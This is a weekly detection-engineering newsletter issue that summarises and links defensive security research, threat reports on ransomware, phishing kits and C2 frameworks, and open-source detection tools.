Detection Engineering Weekly #11 - Democratizing Detection and OPSEC Fails
Last week's news and how-tos in the art and science of Detection Engineering
Welcome to Issue 11 of Detection Engineering Weekly!
This week’s recap:
A 💎 from Palantir on crowdsourcing security
Layering telemetry to increase efficacy, Linux threat detection, Flipper zero detection opportunities
The largest DDoS ever recorded (this week)
If you haven’t subscribed, please consider! I’ll do all the hard work of aggregating and writing, so you don’t have to :)
Happy Hunting
Explain Detection Engineering to your CEO: Feature #4 - Alec Randazzo
Social links: LinkedIn
Is it just me, or is everyone much better at describing detection engineering to this hypothetical CEO? I like Alec’s description of a detection engineering program as a hedge against control failures. As the threat landscape changes daily, so do our controls, so adapting and creating forward-looking and future-proof threat detection is key to reducing the impact of any control failures. Well put, Alec!
💎 Detection Engineering Gem 💎
Democratizing Security Detection by Palantir
This gem, in my opinion, shows the direction of where security needs to go to scale without filling the "skills gap" that we talk so much about. All security teams are outnumbered. By using the organization to your advantage, whether it denies an MFA prompt to issue an alert or gives instructions on reporting weird password reset prompts to their security team, by crowdsourcing detection, you can get a lot of mileage from your "normal" employee.
State of the Art
Adversary emulation on AWS with Stratus Red Team and Wazuh by Pacome Kemkeu
Amazing writeup on setting up an adversary emulation lab using the open-source SIEM Wazuh and Stratus Red Team. Full disclosure, Stratus was built by the good folks here at Datadog, so I am a bit biased, but it is great to see how an open-source tool enters "exit velocity" of usefulness with integrations into other tools.
Telemetry Layering by Jonathan Johnson
Telemetry layering is a process where you create a detection that captures a tactic using one or many telemetry sources. For example, if you want to capture when an adversary loads a .NET assembly, how many event traces are you looking for to find this operation? What if the adversary knows you are looking at these sources and begins patching your sources to prevent logging? By layering telemetry sources, you can capture the detection in case one or many fail.
Fantastic IIS Modules and How to Find Them by Splunk Threat Research Team
I've been jumping up and down in joy with all the research being done on webserver modules! Great post by the Threat Research team at Splunk on using Atomic Red Team to emulate module loading on IIS servers and detection opportunities to catch these nasty buggers in real-time. The "common paths" tuning parameter is a great nugget of detection logic that should significantly increase fidelity.
Establishing a Detection Engineering Program from the ground-up by Sohan G
Interesting survey of many threat detection and engineering resources stuffed into one blog post. The author also showcases their "Blue Team Funnel," which is inspired by the funnel of fidelity. They also overlay roles and frameworks over their funnel to show areas of responsibility based on what stage in the funnel you are in.
Finding Flipper Zero by Jim @ Grumpy Goose Labs
Cool to see some detection opportunities surrounding Flipper Zero! I've had a lot of fun with mine, mostly for stunt hacking, but I know it can be an effective tool for BadUSB attacks. It looks like the Flipper devs did not do the greatest job masquerading USB signatures, even when Flipper is turned on to masquerade as a normal USB device.
Bypassing MFA: A Forensic Look At Evilginx2 Phishing Kit by Carly Battaile
Evilginx2, which is a man-in-the-middle attack phishing server that allows 2FA bypass, and is also only meant for use in demonstration and educational purposes, is definitely not used just for demonstration and educational purposes. Luckily, researchers like Battaile exist and can write about the attack flow for a 2FA bypass phishing attack and highlight detection opportunities along the way!
Linux auditd for Threat Hunting Part 1 by IzyKnows
Part 1 of 2 blogs on some of the best ways to write audit rules inside Linux to do threat hunting. I think the author confused hunting with detection (their slug has detection). Still, a great introduction to performing threat detection using out-of-the-box capabilities on Linux.
EP108 How to Hunt the Cloud: Lessons and Experiences from Years of Threat Hunting by Cloud Security Podcast
If you want a zero-to-hero podcast on truly understanding threat hunting and what it is NOT, this podcast is for you! John Stoner does a great job answering questions by the Cloud Security Podcast hosts on how hunting can influence threat detection.
Threat Landscape
Collect, Exfiltrate, Sleep, Repeat by The DFIR Report
Interesting DFIR analysis of an incident that used AutoHotKey for keylogging. It was nice to see some semblance of the past with a Malicious VBA macro being executed for initial access instead of OneNote files!
New ESXiArgs ransomware version prevents VMware ESXi recovery by Lawrence Abrams
After the initial ESXiArgs ransomware snafu, where the actors only encrypted the config file, the actors pivoted to performing a successful ransomware operation and targeted virtual machine files. Here's the weird part: they still did not encrypt the full machine files and instead used a step counter to encrypt 1 megabyte at a time.
Evasion Techniques Uncovered: An Analysis of APT Methods by Christiaan Beek
TIL what MOTW means. Mark-of-the-Web is a technique that takes advantage of how OSes can mark a container file (such as a VHD) that was downloaded from the web, but files inside do not contain the same mark, allowing them to bypass trust controls. Beek describes this technique from the PlugX malware that Rapid7 saw observed in the wild in January.
CISA Adds Three Known Exploited Vulnerabilities to Catalog by CISA
Not three, make that seven new vulnerabilities in the last four days. If you don't have this list as part of your detection backlog, I highly recommend bookmarking it. The latest seven posted here range from Microsoft, Apple iPhones, and to Intel.
Cloudflare mitigates record-breaking 71 million request-per-second DDoS attack by Omer Yoachimik, Julien Desgats and Alex Forster
Have you heard of volumetric DDoS attacks? How about HYPER volumetric attacks? Well, Cloudflare has, and they apparently stopped dozens of them over the weekend. I really like following these anti-DDoS provider blogs because you can see that they are subtly one-upping each other by finding an even bigger attack than others. Nice work, Cloudflare!
Havoc Across the Cyberspace by Niraj Shivtarkar and Shatak Jain
Havoc C2, an open-source C2 framework, was found being used in the wild by the team at ZScaler ThreatLabz. The best part of this blog is the opsec blunders made by the actor. Apparently, the C2 domain had an open directory webserver that contained screenshots of the actor using Metasploit and capturing their desktop.
Open Source
Guarddog 1.0 by Datadog Security Labs
Full disclosure: I work at Datadog. Shameless plug: I don't care, as I'm super excited about this release. You've seen me post a few stories surrounding malware in pypi, well, Guarddog 1.0 now scans npm packages for malware! And guess what? It's free!
Detections by Delivr-To
I haven't seen any open-source rules for Sublime's product, maybe I haven't looked hard enough, either! Delivr-To's team delivered here some rules for capturing malicious attachments and brand impersonation.
Secrets Patterns Database by mazen160
Recently created repo with over 1600 regular expressions that are mapped to secrets found in all kinds of applications, API keys, passwords, and tokens
Birdcage by Phylum
A rust-based tool that installs packages from your favorite programming language in a sandboxed environment to see if they are malicious. Phylum's cli project invokes birdcage when interacting with these different package managers and stops you from installing if it finds something risky.
Tripwire — red|purple|blue team detection lab orchestration by hacksplaining
Tripwire is a self-contained detection lab environment. Projects like this are nice to have because, as the author explains, you can run your attacks, observe logs and telemetry, then create detections all in one single pane of glass.